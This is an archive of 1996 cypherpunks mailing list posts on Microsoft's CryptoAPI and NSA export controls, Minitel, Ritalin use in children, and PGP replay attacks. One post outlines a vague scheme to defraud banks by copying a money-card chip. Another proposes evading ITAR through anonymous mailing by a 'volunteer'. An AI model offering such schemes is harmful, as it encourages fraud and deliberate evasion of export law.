> Date: Tue, 9 Jul 1996 15:15:26 -0700
> From: Bill Frantz <frantz@netcom.com>
> To: cypherpunks@toad.com
> Subject: Re: Contracts, Responsibilities, and Drug-Dispensing
> 
> I think the really interesting question underlying this whole discussion is
> how a minor child makes the legal transition to a competent adult.  This
> issue comes up again and again.  We see it in "parental consent" laws
> requiring parental consent for a minor girl to get an abortion.  We also
> see it in issues like when a minor child may throw off the "protection" of
> products like SurfWatch.
> 
> ObCrypto: When may a minor child say no to PAK (Parental Access to Keys)?
> 

personaly, being legally a minor child (but only for 10 more months), i've
never used programs like SurfWatch, and I don't really think i've been
completely deranged by it.

My parents don't know what I see on the net, and pretty much they don't
try to regulate it..  Yet i'm still normal, I make good grades (ok, decent
at best in some classes, but I do suffer from ADHD/Learning Disibilities),
and I'm not some complete pervert.  Sure, i've seen my share of porn, but
everybody's seen SOME porn... anybody that says they've never done
ANYTHING like that is either godly, or a complete social outcast who sits
around and, as my AP Bio teacher would have put it, comtemplates their
naval, all of the time.  It just doesn't happen.

The important part is that people be mature about it.

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMeNQXzAJap8fyDMVAQEH6Qf8DQHPMFTlxcMuYArD834ImgSWCemCLAq8
UnNDyll59/6DLuIoTg5iYSfqRWFRi/9CGKicK6CtjxTBhwnuzbPTuYOAmIvMxlTM
TViUVmXxjs/T5MDCvhJUxVD28V1Yg5jLK34U55HK+OlTPn79mEmixYQM/9ulNz91
3EJtXR9LGa5L/CFbX+kbC4MTH4BBsWR7GoUHOhFeICuFplX1GU1WrUgjIwh+OhqL
BLBqkYIRpuJv7T1J4LWY8l0g3eTRnxALeAjIvlv7wEHush4f4uvO5NRFs4Q5AN2n
J6q+xU8ckV5mVSbG1qPVXEIxqtJk0kCZo4iDgNzD0RwJ5x/hqLNmxw==
=Yd2H
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 10 Jul 1996 18:19:14 +0800
To: cypherpunks@toad.com
Subject: Re: July Freedom Forum Meeting
In-Reply-To: <v03007601ae0895a2858e@[199.0.65.105]>
Message-ID: <Pine.LNX.3.94.960710064448.2225B-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 9 Jul 1996, Robert Hettinga wrote:

> Date: Tue, 9 Jul 1996 19:04:46 -0400
> From: Robert Hettinga <rah@shipwright.com>
> To: dcsb@ai.mit.edu
> Cc: cypherpunks@toad.com
> Subject: July Freedom Forum Meeting
> 

[stuff rm'd]

> Banks have been doing "electronic funds transfers" for years, and now 
> ATM transactions have skyrocketed, due to their convenience.  What 
> happens when you can take complete control by saving your e-money right 
> in your own personal computer's hard drive?  Will there be competing 
> e-currencies?  Will transactions become invisible?  The internet and new 
> encryption techniques make the possibilities absolutely enthralling.

this SHOULD never happen, for the same reason that money cards (the one's
with the chip embedded in the plastic) should never happen.

I'll use the card as an example of why not...

ok, say I DID get a money card... here's the process that makes the
encryption, and/or any other security, useless.

1) get a bank loan, and transfer the $$ onto the card.. lets say
$100,000...

2) copy the chip.

3) now go cash both at seperate ATM machines, the same day.

4) pay off your loan. (you decided you didn't NEED a house after all)

5) move to switzerland, because this is VERY tracable.

you now have $100,000 CASH, and a small paper trail. No cryptanalisys
required.

Of course, this would require some equipment, but anybody who can afford
the equipment, with, say a small loan, can pay back their loan that day,
and still have a bit of spending cash.

 --Deviant



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMeNWdDAJap8fyDMVAQGkxAf9G+OQ1k93vrQH7Mo5uTIUjA7D7RmFZarJ
jG/ul8AVBy3Ca6HL8xo0ZZKGNSatrcG/85rN6U9WJJIwoW3bxoW+1PearB8wwzvE
1iHBTvovzPy1QE2wjTy3wgtml/hDXW7tEfApp6CxxA26vcCRHyQ27xr2o5KGqjIi
3tEGOx+fMYwP9FGOMjyy63C2dzBG2MvXihvFF5jPiiZUinvv4W/qO/tCIKrBle+s
edc+sVaLDZLxL7CGwIpeSU2ADQlb4fBypBT4OErdnm5KcGEwQ3lnLooCWHTsc1Gp
vZ9gW5jqBzWtMOVg73PrGuyxwUC4hWLaA93aSJtkrOS1ZwRbNtikLg==
=Qf6K
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 10 Jul 1996 19:24:55 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607100140.SAA15188@fionn.lbl.gov>
Message-ID: <Pine.LNX.3.94.960710083605.2225D-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 9 Jul 1996, Michael Helm wrote:

> Date: Tue, 9 Jul 1996 18:40:30 PDT
> From: Michael Helm <mike@fionn.lbl.gov>
> To: Mike Duvos <mpd@netcom.com>
> Cc: cypherpunks@toad.com
> Subject: Re: [RANT] Giving Mind Control Drugs to Children
> 
> On Jul 9, 12:02pm, Mike Duvos wrote:
> > If we have safe and effective medications which increase
> > alertness in the school and in the workplace, why shouldn't
> > everyone be able to take them in small doses as the need arises?
> 
> So?  I hate to be flip, but is there a coffee shortage in your area?
> 
> Stimulants don't have the same effect on everybody.  "Normal" people
> who take stimulants tend to act a lot like untreated hyperactives:
> jittery, unfocussed, irritable.  Your point about long term use
> is well taken, many people find the positive effects wear down after
> a while.  Sometimes this is alrite, because in the meantime they
> have been able to learn coping strategies they were unable to learn
> before.  Sometimes it is not alrite, because their problems are too
> severe, & they need other treatment.
> 
> 

hrmm.. I'm certified ADHD, and I drink more than LD50 Caffeine in cokes
per day.... what does that make me? ;)

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMeNruzAJap8fyDMVAQHAbgf/TJ5TDJrkke3sMd1ogYyS+WS2aremtmo4
LRJY7TxMIE4cIZ/SES3c0dy2qrkCj7dKUManULFA13JOOBqW8gxwWRom9w+4Ew5i
VuAQHfw+21GVaYtqeMyppzVDgC5w2wTmXN39pzbdm0N+aa/bFb0+NpsFTUsXKSUq
PHtQVXhTnhV/rRMRRAWg4K0ugzbYE+7sWc/RFayCh+Setu0CyVza2X8p71eXel56
dspdENs+RgRIrZZb9IjjMGzxtrXfk8cMTHaH1aCVJ9z7eTmzmj5KzIR3uIToGebU
eO1nrRnwacNgiU4V4q5+Hp+ejMzUiFC4SKrkWf5JL/2CJ0S3FsvqDw==
=7R8s
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 10 Jul 1996 19:23:34 +0800
To: cypherpunks@toad.com
Subject: Re: MSoft crypto API's
In-Reply-To: <199607100335.UAA01215@mail.pacifier.com>
Message-ID: <Pine.LNX.3.94.960710084741.2394A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 9 Jul 1996, jim bell wrote:

> Date: Tue, 09 Jul 1996 20:34:11 -0800
> From: jim bell <jimbell@pacifier.com>
> To: George Kuzmowycz <gkuzmo@ix.netcom.com>, cypherpunks@toad.com
> Subject: Re: MSoft crypto API's
> 

[stuff moved to /dev/null]

> 
> Couldn't somebody IMPORT a piece of encryption software, have it signed by 
> Microsoft, then take the XOR of the signed and unsigned software and export 
> it?  (It's not a tool capable of encryption...)
> 

Hrmm.. at this point I am reminded of when mit.edu refused to allow my
brother to ftp the non-international version of PGP...

To make a long story short, he promptly received the exact same file from
a .de server.

> Or:  Microsoft presumably has foreign branches, or at least it could easily 
> afford to set up one.  What's to stop Microsoft from signing foreign 
> encryption software outside of the US?  The software is never exported 
> (since it's already outside the country...), so there's no USA-law involv
> ement.
> Jim Bell
> jimbell@pacifier.com
> 
> 

Perhaps the real question is this... Can MS reliablt develop a working and
secure encryption package that we should all trust in the first place?  I
doubt it, and I'll wager so does the NSA if you catch my drift...

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMeNvDDAJap8fyDMVAQG0cAf+MXQEE3sFOoymJOhnTegox58TK5Tc+iZj
xK3qWObTvFwOTPzs0n9dgI60EJfxjjVmwiEvDWZQaNzxgxyCXLS6FFwrV8WHC5vT
/HxGnskCU3gNTpDh5S2nsJk0Huhmj5snE1ViETIgyN9i1dUKt/KCHM+TXDOQvyd0
V25NnDgzHG6dVcLE7ATAoa/1p2XobEFB/ZOgiInYVr+tEO8EzIY3eoKKoOJ92le0
JrirB3NfXGBfEoajp34azxBs6549EKCqLI5vjfzNoMRFHVqKpmSJZLVwMTIOJ4Ks
HE123I5xXx3heQrdNtzeg/m8XRKOko6HYkBrwNjgoO1+qW23LU89CA==
=pCQy
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Wed, 10 Jul 1996 17:42:01 +0800
To: cypherpunks@toad.com
Subject: Minitel "saved" by hackers?
Message-ID: <1.5.4.32.19960710115147.002ccb8c@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


I'm reviewing "Cultures of Internet: Virtual Spaces, Real Histories, Living
Bodies" edited by Rob Shields. Chapter 2, "The Labyrinth of Minitel" by
Andre Lemos tells a fascinating story, after you get past the verbiage in
the introduction (sample: "If modernity refused the artificial, and deepened
separations and dichotomies, postmodernity tries to surpass well-established
dichotomies, not in the dialectical sense through sublimation and synthesis,
but more in the direction of making a place for dialogical complexity").

This may be old hat to cypherpunks, but it seems that the system, conceived
as a videotex system, was hacked: "At the end of 1981 the messaging software
... was pirated by some users planning to communicate between each other in
real time. Through this detournement -- literally, a 'hijacking' was born
the messagerie." These included games dialogs in real time and postings.
Soon there was the "messagerie rose", the sex stuff  -- which generated most
of the revenues. As Claire Ancelin notes,"the public has not hesitated to
manifest tastes often opposed to those foreseen by experts, this public has
not hesitated to make a serious information tool into a frivolous
communication tool."

So, shocked by this, what does the government do? Being unable to
distinguish between different kinds of messageries, the government put a 30%
tax in 1989 on all, and raised it to 50% in 1991! No wonder the Internet is
gaining rapid popularity in France.

My questions: 
1) are any of those 1981 French hackers on this list or known to people here?

2) I checked out "Minitel history" on Alta Vista, and since my French is
very modest, downloaded http://www.dlib.org/dlib/december95/12kessler.html,
The French Minitel: Is There Digital Life Outside of the "US ASCII" Internet?
A Challenge or Convergence? by Jack Kessler, and
http://tklab6.informatik.uni-bremen.de/nii/Conference/Abstracts/berne.html
THE MINITEL SUCCESS by Dr. Michel Berne.  Surprisingly, neither mentioned
the 1981 hijack. Can anyone suggest better references?

3) Kessler raised a controversial point: "Centralized control -- its
political as well as its social and economic manifestations -- is relatively
untested. Some fans of the Internet even deny the possibility of centralized
control in their version
of "Cyberspace". Yet such control is the single greatest issue of networked
information to many Asians. Minitel's approach, which is so different from
the Internet's celebrated de-centralized structure, provides useful
comparisons for both systems to consider.
...
The question for networking's next generation is what will scale up for
Asia? To meet this challenge, some "convergence" -- some pooling of talents
and approach, combining the sophisticated with the simple, the academic with the
commercial, the decentralized and chaotic with the centralized and
bureaucratic and controlled -- might not be such a bad idea for both the
Internet and the Minitel to pursue now."

Do you know of any country in Asia or elsewhere favoring the Minitel
"centralized and bureaucratic" model over the Internet?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Wed, 10 Jul 1996 20:39:34 +0800
To: perry@piermont.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <960710120333.21003a36@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


>No. I am proposing that people who wish to voluntarily take a medicine
>that they feel improves their condition be left the hell alone by
>busybodies like you, Tim May, et al.
>
	And I say I don't care what they do with their lifes as long as
it doesn't affect mine. When someone smokes besides me and I have to breath
the smoke, s/he's affecting my health. When someone takes antibiotics s/he
doesn't need and selects resistant bacteria, that affects me. When someone
forces me into doing something, that affects me.

	All I ask is a say when whatever they do may harm me. If that's
being a busybody, I guess I am. Sorry if that upsets you.

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Wed, 10 Jul 1996 21:25:41 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <960710122900.21003a36@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


"mike@fionn.lbl.gov" wrote:
>have to be able to perform well enuf in school to get good recs
>& good marks in subjects that interest them.  They didn't make this
>system, but they do have to adapt to it somewhat.
>
	Maybe they would be better off fighting against a system that
alienates them than contributing to support it? Seems to me that's
shooting their own foot.

	Now, I don't say they should do that. I understand there are many
motivations, personalities, pressures, etc... and thet it's perfectly
natural that one prefers to integrate in the whole than to be an alienate.

	But then, why do we worry about crypto here? Why not adapt to the
system that the powers-that-be are imposing? Why do we not give up at all
and let others make the system? I'd say that some level of inconformism
still remains, from which I congratule.

	Yes, they (we) didn't make this system. But they (we) are making
tomorrow's (and this one too). I agree with Perry, it's each one's choice
how to live his/her life, but we all are contributing to how every other
will be able to live, and we shouldn't forget that.

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Wed, 10 Jul 1996 17:07:40 +0800
To: George Kuzmowycz <gkuzmo@ix.netcom.com>
Subject: Re: MSoft crypto API's
In-Reply-To: <199607092319.QAA00934@dfw-ix2.ix.netcom.com>
Message-ID: <Pine.LNX.3.91.960710123700.26680M-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jul 1996, George Kuzmowycz wrote:

>   The June 10, 1996 Network World carried a story on page 8 under the 
> title "Microsoft breaks crypto barrier", which starts off as follows:
> 
>   " Microsoft Corp. last week said it will include cryptography-based 
> security technology in its operating systems, messaging product and 
> Web browser through a new set of APIs that will be available both in 
> the U.S. and overseas.
> 
>  " The fact that the National Security Agency is allowing Microsoft 
> to export the cryptographic APIs is somewhat of a coup for the 
> software vendor, although the NSA did nothing to alter the current 
> export ban on strong encryption."
> 
>   Later on, it says:
> 
> "  Microsoft's Crypto APIs will be available to third-party vendors
> writing applications with embedded security. But the hardware or
> software Crypto-engines for these applications will need to be
> digitally signed by Microsoft before they will work with the APIs.
> Under an unusual arrangement with the NSA, Microsoft will act as a
> front man for the powerful U.S. spy agency, checking on whether the
> vendors' products comply with U.S. export rules."
> 
>   I was a bit surprised not to see any discussion of this here. Is it 
> just old news? Or maybe people here don't read Network World?
> 
>   I didn't paste in the whole article for copyright reasons. Since 
> they seem to be on a one-month lag with posting back articles on 
> their Web site, it just this week became available at 
> www.nwfusion.com. 
> 
>   An MS/NSA alliance?
> 
>         -gk-
> 


More details are available from MS' web pages at:
http://www.microsoft.com/win32dev/apiext/capi4.htm
and:
http://www.microsoft.com/intdev/security/cryptapi.htm

I understand that NSA may have accepted the arrangement because only
signed CSP's will be loaded under the CAPI, and MS will only sign them in
Redmond. So, strong CSP modules developed outside the US will not be useable
there because, once gone to Redmond, won't be re-exportable. On the other
hand, I suspect that writing a binary-compatible CAPI emulator shouldn't
be that difficult. That would allow to use the same CAPI-compliant 
applications anywhere in the world, running over different 
implementations of the crypto engine.

The interesting part is that the basic, but crippled, CSP (PROV_RSA_FULL) 
will be supplied for free by MS:

--http://www.microsoft.com/win32dev/apiext/capi4.htm -- 8< -----------
[...]
Microsoft licensed cryptographic technology from RSA Data Security to 
create the base or default software CSP that ships with the operating
system. The Microsoft RSA Base provider consists of a software 
implementation PROV_RSA_FULL provider type (see accompanying table of
provider types). This CSP supports both public-key and symmetric (or 
"conventional") cryptography. It is exportable and will ship everywhere
that the CryptoAPI is present.
[...]
------------------------------------------------------- 8< -----------

That should free the developers of secure application from the need of 
buying licences from RSADSI, at least for export-grade functionality.

Enzo





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Wed, 10 Jul 1996 22:26:58 +0800
To: Matthew Carpenter <mcarpent@mailhost.tcs.tulane.edu>
Subject: Re: more about the usefulness of PGP
In-Reply-To: <199607092115.QAA78592@rs6.tcs.tulane.edu>
Message-ID: <199607101116.NAA17386@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Cool stuff, Matthew.  You've gotta think about replay and delay
attacks though.  A good start is to include a time-stamp in the
authenticated message (I'm not sure if PGP's built-in timestamp
is authenticated.  Anyone?), save the latest timestamp which you
have authenticated, and reject messages unless they have an 
authenticated time-stamp later than that one.


What fun!  Keep me informed.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMeORJ0jbHy8sKZitAQF/zgL9EbVUojASbX/TAY6YrS6hzUYR+6sE7bHI
x01b12Yt2mQzWq//t636ROO1hzM/in9Co5jWjRhN6pQSnjNVI+OQC8iGw1eZm2c/
/lZ/MCqN+T5UvGgzNc62HyAWBZ9fIm/9
=2MGB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ".." <warpdriv@mindport.net>
Date: Sat, 13 Jul 1996 07:16:35 +0800
To: "'Declan McCullagh'" <declan@well.com>
Subject: RE: Technology and Privacy
Message-ID: <01BB6FE1.999C4260@synapse-34.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



DM,sir, you always bring good stuff, but...am i really supposed to believe that 
a warrant or other writ will really control the process?
----------
From: 	Declan McCullagh[SMTP:declan@well.com]
Sent: 	Monday, July 01, 1996 7:13 PM
To: 	John Young
Cc: 	cypherpunks@toad.com
Subject: 	Re: Technology and Privacy

>   To set the record straight, military thermal imaging is
>   used to support civilian law enforcement only after other
>   probable cause for a search warrant, such as power bills,
>   observation of boarded-up windows, vents on the roof to
>   draw away heat and buys by confidential informants, are
>   documented. The military is then called in, using thermal









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Thu, 11 Jul 1996 04:12:40 +0800
To: Arun Mehta <cypherpunks@toad.com
Subject: Re: Minitel "saved" by hackers?
In-Reply-To: <1.5.4.32.19960710115147.002ccb8c@giasdl01.vsnl.net.in>
Message-ID: <v03007802ae097708cc1c@[17.219.102.27]>
MIME-Version: 1.0
Content-Type: text/plain


Arun Mehta describes the "hijacking" of Minitel (where users changed
a videotex system into two-way communication medium) as a "hacking"
(in the computer breakin sense).

I think it might be more accurate to call this a "redirection" -- the
people using Minitel "manifest[ing] tastes often opposed to those foreseen
by experts"

A similar thing happened to ARPANET in the late 1970's, with superficially
frivolous newsletters such as SF-LOVERS and, of course, the proliferation
of personal correspondance.

Perhaps this is just another example of the cypherpunks manifesto:
"information wants to be free."

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Thu, 11 Jul 1996 00:26:25 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <AE0916E0-3A5976@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain


First, a disclaimer:  I think adults should be allowed to ingest whatever
substances they desire, and parents should be allowed to raise their kids
without undue interference from the government.  

Having said that, I think that the major issue with Ritalin is that parents
are giving it to their children in significant percentages of the
population.  Since Ritalin is "medicine" and is prescribed by doctors, it
is assumed to be safe.  However, I would bet that many parents whose
children are on daily doses of Ritalin would not think of drinking coffee
or alcohol while pregnant or nursing.  It is important to consider that any
drug used over a period of time may have lasting (possibly negative)
effects, and that these effects are multiplied when the drugs are taken by
still-developing children.  

While it is crucial for an adult to be able to function and maintain a job,
is it really as important for a kid to be able to sit still in school?  

	Clay

***************************************************************************
Clay Olbon II       *      Clay.Olbon@dynetics.com
Systems Engineer    *    PGP262 public key on web page
Dynetics, Inc.      * http://www.msen.com/~olbon/olbon.html
***************************************************************** TANSTAAFL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 11 Jul 1996 00:30:36 +0800
To: Michael Froomkin <cypherpunks@toad.com>
Subject: Re: [Poster] Add Uncle Sam to Your Circle of Friends and Family
In-Reply-To: <Pine.SUN.3.94.960709152150.21622A-100000@viper.law.miami.edu>
Message-ID: <199607101231.IAA15085@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin writes:

: http://www.rsa.com/rsa/gallery/circle1.gif

A most useful gif!  Thanks.

What is the copyright status?  I can think of some good uses for it.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Tiemann <tiemann@cygnus.com>
Date: Thu, 11 Jul 1996 04:14:45 +0800
To: rpowell@algorithmics.com
Subject: Re: what's up with GROW?
In-Reply-To: <96Jul10.113046edt.20484@janus.algorithmics.com>
Message-ID: <199607101536.IAA19557@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


To follow up further...we are very interested in deeply embedding
network security in all software components we deliver as "enterprise
solutions".  This is the commercial analog (I believe) of what
cypherpunks want in their personal space.  Our approach right now is to
view Kerberos as a solution to two problems (user authentication and key
management), and to extend basic services such as web servers, web
clients, etc., with Kerberos to build a coherent solution.

We believe that Java has effectively solved one of the problems that
GROW was intended to address: ubiquitous extensibility.  While some may
argue the finer points of just how powerful the Java model is compared
to the scheme model, there is a market momentum that argues for a level
of ubiquity that we could not have hoped to achieve through Scheme.

That said, perhaps it would be worthwhile to compare notes on current
Cygnus and Cyberpunks projects and approaches, to see if there are any
good synergies to tap.  Mark Eichin (our long-time V5 technical lead)
will be visiting from our Boston office the week of 7/22 for the Usenix
network security conference.  Perhaps we could have a mini meeting of
minds around that time.  Mark is eichin@cygnus.com.

Michael

P.S.  If the above sounds like more smoke than cyberpunks are accustomed
to, let me know in private email, and I'll continue follow-ups among
those who give me a positive response.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 11 Jul 1996 04:49:46 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: MSoft crypto API's
Message-ID: <199607101545.IAA29371@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:51 AM 7/10/96 +0000, Deranged Mutant wrote:
>On  9 Jul 96 at 20:34, jim bell wrote:
>[..]
>> Unexplained:   What if the program Microsoft is asked to sign is not 
>> intended for export?  Presumably, NSA has no authority, then, and thus 
>
>They could insist on only signing exportable software, and in theory 
>use that as ITAR-relaxing leverage.
>
>Methinks it's a bad move to only have MS sign software... presumably 
>they won't outright refuse to sign competitors software.  It would be 
>a conflict of interest for them not to... very usable as evidence 
>against MS in an anti-trust suit.  Independent CA's would be better.

Yes, that's the anti-trust vulnerability I mentioned.  It is unclear if 
Microsoft could legitimately refuse to sign any software presented to it, 
regardless of its legal exportability.


>IMO, it gives a false sense of sucurity to even require crypto apps 
>to be signed.  A lot of folks would want a developer's kit (probably 
>cost $$$) to get around that requirement... nice loophole, BTW, for 
>those that can afford it.  Or until somebody patches the code to 
>ignore bad signatures of lack of them and releases the patch.

I'm sure that will happen!


>> presumably Microsoft shouldn't be able to refuse to sign anything they're 
>> asked.
>
>Why? Assuming there were no export restrictions... if it's signed by 
>MS, people will take it to mean that MS is vouching for it.  If they 
>sign a library that does 'naughty things' or is an incredibly 
>incompetant implementation of an algorithm, it could turn out to be 
>bad PR for them.  (Hm... they could use this as an excuse to read 
>competitor's source code.)

What MS would be signing for is the GENUINENESS of the software, not its 
effectiveness.  Sorta analogous to key-signatures in PGP.




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Thu, 11 Jul 1996 05:12:42 +0800
To: "'cypherpunks@toad.com>
Subject: RE: MSoft crypto API's
Message-ID: <01BB6E3D.CC74FCE0@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


ok, last time:

the deal was that Microsoft got the permission to ship a generalized API if 
the crypto-engines
are signed to prevent code that conforms to export restrictions from being 
tampered with after the fact: hence the signing.  This prevents code that 
is conformant from being patched, e.g. to turn a 40-bit key parameter into 
a usable one.

Now I suppose it could be that there is a back-door deal that MSFT will 
provide to NSA info regarding the
originators of the engines, but let's have some evidence of it before yet 
another conspiracy rant, OK?



----------
From: 	Black Unicorn[SMTP:unicorn@schloss.li]
Sent: 	Tuesday, July 09, 1996 8:27 PM
To: 	George Kuzmowycz
Cc: 	cypherpunks@toad.com
Subject: 	Re: MSoft crypto API's

On Tue, 9 Jul 1996, George Kuzmowycz wrote:

[...]

> "  Microsoft's Crypto APIs will be available to third-party vendors
> writing applications with embedded security. But the hardware or
> software Crypto-engines for these applications will need to be
> digitally signed by Microsoft before they will work with the APIs.
> Under an unusual arrangement with the NSA, Microsoft will act as a
> front man for the powerful U.S. spy agency, checking on whether the
> vendors' products comply with U.S. export rules."
>
>   I was a bit surprised not to see any discussion of this here. Is it
> just old news? Or maybe people here don't read Network World?

[...]

>   An MS/NSA alliance?
>
>         -gk-

This is a very deft and sly move, if it was indeed planned, by the NSA.

Clearly they have got the message.  Political efforts to curtail crypto
are doomed to failure.  Economic strangulation is the way to go.

Well here you are folks, months of bitching about how stupid the NSA must
be has paid off.  Not only is this clever, its insidious.

1. It's too difficult for Joe Sixpack to understand.
2. It preys on the market leader already, rather than attempting to
bootstrap (as with clipper).
3. It uses as its implementation a private, rather than a public entity.

Now this strikes me as something truely frightening.  The NSA has become
an intelligence agency which is effectively working in concert with
private interests to conduct internal security operations by proxy.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Thu, 11 Jul 1996 04:23:19 +0800
To: "'Deranged Mutant'" <WlkngOwl@unix.asb.com>
Subject: RE: FW: MSoft crypto API's
Message-ID: <01BB6E3D.CE7D5000@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


but they don't sign the drivers.  they sign the CSP.  only.  drivers are (can be) shipped as totally separate pieces of code.

----------
From: 	Deranged Mutant[SMTP:WlkngOwl@unix.asb.com]
Sent: 	Tuesday, July 09, 1996 10:06 PM
To: 	geeman@best.com
Subject: 	Re: FW: MSoft crypto API's

On  9 Jul 96 at 21:37, geeman@best.com wrote:
[..]
> Excuse me, er, NW, how is MSFT going to sign hardware?  heheheheh.

They'll sign the drivers.  (Instead of DES software it might be a 
driver that uses a DES card.)

Rob
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mike@fionn.lbl.gov (Michael Helm)
Date: Thu, 11 Jul 1996 05:15:03 +0800
To: The Deviant <Clay.Olbon@dynetics.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <deviant@pooh-corner.com>
Message-ID: <199607101612.JAA19500@fionn.lbl.gov>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 10, 12:29pm, JR@ns.cnb.uam.es wrote:
> 	Maybe they would be better off fighting against a system that
> alienates them than contributing to support it? Seems to me that's
> shooting their own foot.

Maybe, but consider that they are unable to focus properly on any
activity.  Revolution requires long term focus & unusually good
organizational skills, both are weak in add types.  

On Jul 10,  8:13am, "Clay Olbon II" wrote:
> or alcohol while pregnant or nursing.  It is important to consider that any
> drug used over a period of time may have lasting (possibly negative)
> effects, and that these effects are multiplied when the drugs are taken by
> still-developing children.  

It's a serious question, no doubt about it.

> While it is crucial for an adult to be able to function and maintain a job,
> is it really as important for a kid to be able to sit still in school?  

Well, for the add child, they don't get a proper education by any
measure, no matter what their symptoms are, without some kind of
treatment.  This does not necessarily include drugs, of course, but
some appear to benefit from it.  For the class, a hyperactive student
-- ONE -- is more than sufficient to bring the house down & make it
impossible for the rest of the class to learn anything much of the
time.  As a taxpayer or parent with children in such a classroom
you may find this a matter of some concern.

On Jul 10,  8:37am, The Deviant wrote:
> hrmm.. I'm certified ADHD, and I drink more than LD50 Caffeine in cokes
> per day.... what does that make me? ;)

Probably a good candidate for this year's tooth decay poster child %^)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 11 Jul 1996 05:18:12 +0800
To: Mike Ingle <cypherpunks@toad.com
Subject: Re: MSoft crypto API's
Message-ID: <199607101615.JAA01186@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At this point, someone will probably claim that the export of a mere 
signature (or the XOR between a sig'd and a non-sig'd file) is, itself, 
prohibited from export under ITAR.  However,  I've pointed out in the past 
that even if that export is illegal, it could be done by an unknown 
"volunteer", possibly using means as innocuous as a paper envelope (with no 
return address?) mailed to a confederate outside the US.  Later, it could be 
mailed back to the (foreign) company who wanted it in the first place.

The foreign company would, of course, NOT be guilty of any export violation, 
because it had no part in the export, and it would just be a beneficiary of 
some (guilty) anonymous prankster's action.  This tactic would not benefit a 
